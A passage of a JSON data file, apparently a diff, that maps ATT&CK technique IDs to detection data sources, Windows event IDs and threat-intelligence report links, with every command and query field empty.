"https://www.volexity.com/blog/2018/06/07/patchwork-apt-group-targets-us-think-tanks/", + "https://www2.fireeye.com/rs/848-DID-242/images/rpt_APT37.pdf", + "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/08070903/darkhotel_kl_07.11.pdf", + "https://content.fireeye.com/apt/rpt-apt38", + "http://www.symantec.com/connect/blogs/patchwork-cyberespionage-group-expands-targets-governments-wide-range-industries", + "https://www.symantec.com/blogs/threat-intelligence/leafminer-espionage-middle-east", + "https://researchcenter.paloaltonetworks.com/2016/01/new-attacks-linked-to-c0d0s0-group/", + "http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/the-elderwood-project.pdf", + "https://www.symantec.com/connect/blogs/tick-cyberespionage-group-zeros-japan", + "https://www.csmonitor.com/USA/2012/0914/Stealing-US-business-secrets-Experts-ID-two-huge-cyber-gangs-in-China", + "https://www.welivesecurity.com/2018/03/13/oceanlotus-ships-new-backdoor/", + "https://www.us-cert.gov/ncas/alerts/TA18-074A", + "https://securelist.com/luckymouse-hits-national-data-center/86083/", + "http://securityaffairs.co/wordpress/8528/hacking/elderwood-project-who-is-behind-op-aurora-and-ongoing-attacks.html", + "https://info.lookout.com/rs/051-ESQ-475/images/Lookout_Dark-Caracal_srr_20180118_us_v.1.0.pdf", + "https://securelist.com/operation-daybreak/75100/", + "https://www.secureworks.com/research/threat-group-3390-targets-organizations-for-cyberespionage", + [ + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-management", + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-streams", + "https://docs.microsoft.com/en-us/troubleshoot/windows-client/backup-and-storage/fat-hpfs-and-ntfs-file-systems" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ], + null, + [ + "https://confluence.atlassian.com/doc/working-with-confluence-logs-108364721.html" + ] + ] + }, + { + "technique_id": "T1192", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + [ + "Packet capture" + ], + [ + "Web proxy" + ], + [ + "Email gateway" + ], + [ + "Detonation chamber" + ], + [ + "SSL/TLS inspection" + ], + [ + "DNS records" + ], + [ + "Mail server" + ], + [ + "Packet capture" + ], + [ + "Web proxy" + ], + [ + "Email gateway" + ], + [ + "Detonation chamber" + ], + [ + "SSL/TLS inspection" + ], + [ + "DNS records" + ], + [ + "Mail server" + ] + ], + "external_reference": [ + "https://www.fireeye.com/current-threats/threat-intelligence-reports/rpt-fin4.html", + "https://www2.fireeye.com/WBNR-14Q4NAMFIN4.html", + "https://www.symantec.com/blogs/threat-intelligence/elfin-apt33-espionage", + "https://www.volexity.com/blog/2018/06/07/patchwork-apt-group-targets-us-think-tanks/", + "https://www.cybereason.com/blog/operation-cobalt-kitty-apt", + "https://blog.talosintelligence.com/2018/07/multiple-cobalt-personality-disorder.html", + "http://www.slideshare.net/MatthewDunwoody1/no-easy-breach-derby-con-2016", + "http://www.symantec.com/connect/blogs/patchwork-cyberespionage-group-expands-targets-governments-wide-range-industries", + "https://www.justice.gov/file/1080281/download", + "https://documents.trendmicro.com/assets/tech-brief-untangling-the-patchwork-cyberespionage-group.pdf", + "https://www2.fireeye.com/WBNR-Know-Your-Enemy-UNC622-Spear-Phishing.html", + "http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/the-elderwood-project.pdf", + "https://www.proofpoint.com/us/threat-insight/post/leviathan-espionage-actor-spearphishes-maritime-and-defense-targets", + "https://www.csmonitor.com/USA/2012/0914/Stealing-US-business-secrets-Experts-ID-two-huge-cyber-gangs-in-China", + "https://asert.arbornetworks.com/stolen-pencil-campaign-targets-academia/", + "https://www.welivesecurity.com/2018/03/13/oceanlotus-ships-new-backdoor/", + "https://www.us-cert.gov/ncas/alerts/TA18-074A", + "https://www.fireeye.com/blog/threat-research/2017/09/apt33-insights-into-iranian-cyber-espionage.html", + "https://www.secureworks.com/research/the-curious-case-of-mia-ash", + "https://www.welivesecurity.com/wp-content/uploads/2018/01/ESET_Turla_Mosquito.pdf", + "https://www.fireeye.com/blog/threat-research/2019/01/apt39-iranian-cyber-espionage-group-focused-on-personal-information.html", + "https://researchcenter.paloaltonetworks.com/2018/02/unit42-oopsie-oilrig-uses-threedollars-deliver-new-trojan/", + "https://securingtomorrow.mcafee.com/wp-content/uploads/2011/02/McAfee_NightDragon_wp_draft_to_customersv1-1.pdf" + ] + }, + { + "technique_id": "T1194", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + [ + "SSL/TLS inspection" + ], + [ + "Anti-virus" + ], + [ + "Web proxy" + ], + [ + "SSL/TLS inspection" + ], + [ + "Anti-virus" + ], + [ + "Web proxy" + ] + ], + "external_reference": [ + "https://www.secureworks.com/research/the-curious-case-of-mia-ash", + "https://info.lookout.com/rs/051-ESQ-475/images/Lookout_Dark-Caracal_srr_20180118_us_v.1.0.pdf" + ] + }, + { + "technique_id": "T1199", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + [ + "Application Logs" + ], + [ + "Authentication logs" + ], + [ + "Third-party application logs" + ], + [ + "Application Logs" + ], + [ + "4624", + "Authentication logs" + ], + [ + "Third-party application logs" + ], + { + "data_source": "application log", + "definition": "Logs from events in third-party applications (mail server, web applications, etc.).", + "collection_layers": [ + "host", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Google Workspace" + ], + "data_component": "application log content", + "description": "Data captured in an application log.", + "source_data_element": "application log", + "relationship": "contained", + "target_data_element": "application event entries" + }, + { + "data_source": "logon session", + "definition": "Information about logon sessions being created or terminated by accounts (Local, Domain, or Cloud), interactively or over the network, in order to interact with network resources, applications, or services.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Google Workspace" + ], + "data_component": "logon session metadata", + "description": "Data and information that describe a logon session (such as logon type) and activity within it.", + "source_data_element": "user", + "relationship": "retrieved information about", + "target_data_element": "logon session" + }, + { + "data_source": "logon session", + "definition": "Information about logon sessions being created or terminated by accounts (Local, Domain, or Cloud), interactively or over the network, in order to interact with network resources, applications, or services.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Google Workspace" + ], + "data_component": "logon session creation", + "description": "A logon session for a user was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "logon session" + }, + { + "data_source": "logon session", + "definition": "Information about logon sessions being created or terminated by accounts (Local, Domain, or Cloud), interactively or over the network, in order to interact with network resources, applications, or services.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Google Workspace" + ], + "data_component": "logon session creation", + "description": "A logon session for a user was created.", + "source_data_element": "user", + "relationship": "created logon session from", + "target_data_element": "ip" + }, + { + "data_source": "logon session", + "definition": "Information about logon sessions being created or terminated by accounts (Local, Domain, or Cloud), interactively or over the network, in order to interact with network resources, applications, or services.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Google Workspace" + ], + "data_component": "logon session creation", + "description": "A logon session for a user was created.", + "source_data_element": "user", + "relationship": "created logon session from", + "target_data_element": "port" + } + ], + "external_reference": [ + "https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf", + "https://www.justice.gov/file/1080281/download", + "https://www.fireeye.com/blog/threat-research/2017/04/apt10_menupass_grou.html", + [ + "https://confluence.atlassian.com/doc/working-with-confluence-logs-108364721.html" + ], + [ + "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/basic-audit-logon-events" + ] + ] + }, + { + "technique_id": "T1017", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + [ + "4688", + "Process Execution" + ], + [ + "4688 ", + "Process CMD Line" + ], + [ + "5156", + "Windows Firewall" + ], + [ + "4663", + "File monitoring" + ], + [ + "4688", + "Process Execution" + ], + [ + "4688 ", + "Process CMD Line" + ], + [ + "5156", + "Windows Firewall" + ], + [ + "4663", + "File monitoring" + ] + ], + "external_reference": [ + "https://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.html" + ] + }, + { + "technique_id": "T1097", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + [ + "4624", + "Authentication logs" + ], + [ + "4624", + "Authentication logs" + ] + ], + "external_reference": [ + "http://www.slideshare.net/MatthewDunwoody1/no-easy-breach-derby-con-2016", + "https://www.secureworks.com/research/bronze-butler-targets-japanese-businesses", + "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/march/apt15-is-alive-and-strong-an-analysis-of-royalcli-and-royaldns/", + "https://cdn2.hubspot.net/hubfs/3354902/Cybereason%20Labs%20Analysis%20Operation%20Cobalt%20Kitty.pdf" + ] + }, + { + "technique_id": "T1051", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + [ + "4663", + "File monitoring" + ], + [ + "4688", + "Process Execution" + ], + [ + "4663", + "File monitoring" + ], + [ + "4688", + "Process Execution" + ], + { + "data_source": NaN, + "definition": NaN, + "collection_layers": NaN, + "data_source_platform": NaN, + "data_component": NaN, + "description": NaN, + "source_data_element": NaN, + "relationship": NaN, + "target_data_element": NaN + } + ], + "external_reference": [NaN + ] + }, + { + "technique_id": "T1080", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + [ + "4663", + "File monitoring" + ], + [ + "4688", + "Process Execution" + ], + [ + "4663", + "File monitoring" + ], + [ + "4688", + "Process Execution" + ], + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "thread" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file creation", + "description": "A file was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "file" + }, + { + "data_source": "network share", + "definition": "Information associated with computer resources made available from one host to other hosts on a computer network using protocols such as Server Message Protocol (SMB) and Network File System (NFS).", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "network share access", + "description": "A network share was opened or accessed.", + "source_data_element": "user", + "relationship": "accessed", + "target_data_element": "network share" + }, + { + "data_source": "network share", + "definition": "Information associated with computer resources made available from one host to other hosts on a computer network using protocols such as Server Message Protocol (SMB) and Network File System (NFS).", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "network share access", + "description": "A network share was opened or accessed.", + "source_data_element": "process", + "relationship": "accessed", + "target_data_element": "network share" + } + ], + "external_reference": [ + "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/08070903/darkhotel_kl_07.11.pdf", + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-management", + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-streams", + "https://docs.microsoft.com/en-us/troubleshoot/windows-client/backup-and-storage/fat-hpfs-and-ntfs-file-systems" + ], + [ + "https://docs.microsoft.com/en-us/windows-server/storage/nfs/nfs-overview", + "https://docs.microsoft.com/en-us/windows-server/storage/file-server/file-server-smb-overview" + ] + ] + }, + { + "technique_id": "T1062", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + [ + "System calls" + ], + [ + "System calls" + ], + { + "data_source": NaN, + "definition": NaN, + "collection_layers": NaN, + "data_source_platform": NaN, + "data_component": NaN, + "description": NaN, + "source_data_element": NaN, + "relationship": NaN, + "target_data_element": NaN + } + ], + "external_reference": [NaN + ] + }, + { + "technique_id": "T1019", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + [ + "BIOS" + ], + [ + "EFI" + ], + [ + "API monitoring" + ], + [ + "BIOS" + ], + [ + "EFI" + ], + [ + "API monitoring" + ] + ], + "external_reference": [] + }, + { + "technique_id": "T1492", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [], + "external_reference": [ + "https://www.fireeye.com/current-threats/threat-intelligence-reports/rpt-fin4.html", + "https://content.fireeye.com/apt/rpt-apt38" + ] + }, + { + "technique_id": "T1334", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [], + "external_reference": [ + "https://www.fireeye.com/blog/threat-research/2015/12/the-eps-awakens-part-two.html", + "https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf" + ] + }, + { + "technique_id": "T1272", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [], + "external_reference": [ + "https://www.fireeye.com/blog/threat-research/2015/12/the-eps-awakens-part-two.html" + ] + }, + { + "technique_id": "T1487", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [], + "external_reference": [ + "https://www2.fireeye.com/rs/848-DID-242/images/rpt_APT37.pdf", + "https://content.fireeye.com/apt/rpt-apt38", + "https://www.us-cert.gov/ncas/alerts/TA17-164A", + "https://www.operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Report.pdf", + "https://blog.talosintelligence.com/2018/01/korea-in-crosshairs.html" + ] + }, + { + "technique_id": "T1494", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [], + "external_reference": [ + "https://content.fireeye.com/apt/rpt-apt38" + ] + }, + { + "technique_id": "T1493", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [], + "external_reference": [ + "https://content.fireeye.com/apt/rpt-apt38" + ] + }, + { + "technique_id": "T1342", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [], + "external_reference": [ + "http://www.secureworks.com/cyber-threat-intelligence/threats/suspected-iran-based-hacker-group-creates-network-of-fake-linkedin-profiles/", + "https://www2.fireeye.com/rs/fireye/images/APT17_Report.pdf" + ] + }, + { + "technique_id": "T1341", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [], + "external_reference": [ + "http://www.secureworks.com/cyber-threat-intelligence/threats/suspected-iran-based-hacker-group-creates-network-of-fake-linkedin-profiles/", + "https://www2.fireeye.com/rs/fireye/images/APT17_Report.pdf" + ] + }, + { + "technique_id": "T1480", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "thread" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + } + ], + "external_reference": [ + "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/08064459/Equation_group_questions_and_answers.pdf", + "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/20134940/kaspersky-lab-gauss.pdf", + "https://www.fireeye.com/blog/threat-research/2018/12/overruled-containing-a-potentially-destructive-adversary.html", + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ], + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ] + ] + }, + { + "technique_id": "T1328", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [], + "external_reference": [ + "https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-apt28.pdf" + ] + }, + { + "technique_id": "T1346", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [], + "external_reference": [ + "https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-apt28.pdf", + "https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf" + ] + }, + { + "technique_id": "T1345", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [], + "external_reference": [ + "https://www.cylance.com/content/dam/cylance/pages/operation-cleaver/Cylance_Operation_Cleaver_Report.pdf" + ] + }, + { + "technique_id": "T1313", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [], + "external_reference": [ + "https://www.cylance.com/content/dam/cylance/pages/operation-cleaver/Cylance_Operation_Cleaver_Report.pdf" + ] + }, + { + "technique_id": "T1326", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [], + "external_reference": [ + "https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf" + ] + }, + { + "technique_id": "T1330", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [], + "external_reference": [ + "https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf", + "https://securingtomorrow.mcafee.com/wp-content/uploads/2011/02/McAfee_NightDragon_wp_draft_to_customersv1-1.pdf" + ] + }, + { + "technique_id": "T1333", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [], + "external_reference": [ + "https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf" + ] + }, + { + "technique_id": "T1311", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [], + "external_reference": [ + "https://www.fireeye.com/blog/threat-research/2019/04/triton-actor-ttp-profile-custom-attack-tools-detections.html" + ] + }, + { + "technique_id": "T1329", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [], + "external_reference": [ + "https://www.fireeye.com/blog/threat-research/2019/04/triton-actor-ttp-profile-custom-attack-tools-detections.html" + ] + }, + { + "technique_id": "T1331", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [], + "external_reference": [ + "https://www2.fireeye.com/rs/fireye/images/APT17_Report.pdf" + ] + }, + { + "technique_id": "T1351", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [], + "external_reference": [ + "https://securingtomorrow.mcafee.com/wp-content/uploads/2011/02/McAfee_NightDragon_wp_draft_to_customersv1-1.pdf" + ] + }, + { + "technique_id": "T1307", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [], + "external_reference": [ + "https://securingtomorrow.mcafee.com/wp-content/uploads/2011/02/McAfee_NightDragon_wp_draft_to_customersv1-1.pdf" + ] + }, + { + "technique_id": "T1497", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "thread" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "os api execution", + "description": "A process executed operating system api functions.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "api call" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "os api execution", + "description": "A process executed operating system api functions.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "system call" + } + ], + "external_reference": [ + "https://www.fireeye.com/blog/threat-research/2017/04/fin7-phishing-lnk.html", + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ], + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ] + ] + }, + { + "technique_id": "T1488", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [], + "external_reference": [ + "https://operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Destructive-Malware-Report.pdf" + ] + }, + { + "technique_id": "T1553.006", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "windows registry key" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "windows registry key value" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "windows registry key" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "windows registry key value" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "thread" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/sysinfo/registry" + ], + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ] + ] + }, + { + "technique_id": "T1614", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": "instance", + "definition": "Information about a virtual system within a cloud environment.", + "collection_layers": [ + "cloud" + ], + "data_source_platform": [ + "IaaS" + ], + "data_component": "instance metadata", + "description": "Data and information that describe an instance and activity around it.", + "source_data_element": "user", + "relationship": "retrieved information about", + "target_data_element": "instance" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "thread" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + 